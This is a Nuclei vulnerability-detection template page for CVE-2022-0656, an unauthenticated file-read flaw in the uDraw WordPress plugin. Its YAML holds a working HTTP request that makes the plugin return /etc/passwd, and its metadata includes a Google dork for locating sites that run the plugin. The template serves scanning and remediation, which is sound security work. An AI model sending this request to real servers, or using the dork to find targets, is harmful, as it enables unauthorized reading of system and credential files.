uDraw <3.3.3 - Local File Inclusion

ID: CVE-2022-0656

Severity: high

Author: akincibor

Tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint

Description

uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).

YAML Source

id: CVE-2022-0656

info:
  name: uDraw <3.3.3 - Local File Inclusion
  author: akincibor
  severity: high
  description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade uDraw to version 3.3.3 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0656
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-0656
    cwe-id: CWE-552
    epss-score: 0.00658
    epss-percentile: 0.79479
    cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: webtoprint
    product: web_to_print_shop\
    google-query: inurl:"/wp-content/plugins/udraw"
  tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        action=udraw_convert_url_to_base64&url=/etc/passwd

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "cm9vd" # root in base64
          - "data:image\\/;base64"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022061fdc4e4a660ed0ed786b9a8e03713627cfde276caafb409351154beffbca688022100d9501f3cf449b997787363c48771719ca4cd6abb32ebb2034ba4960d4eac0db0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0656.yaml"

View on Github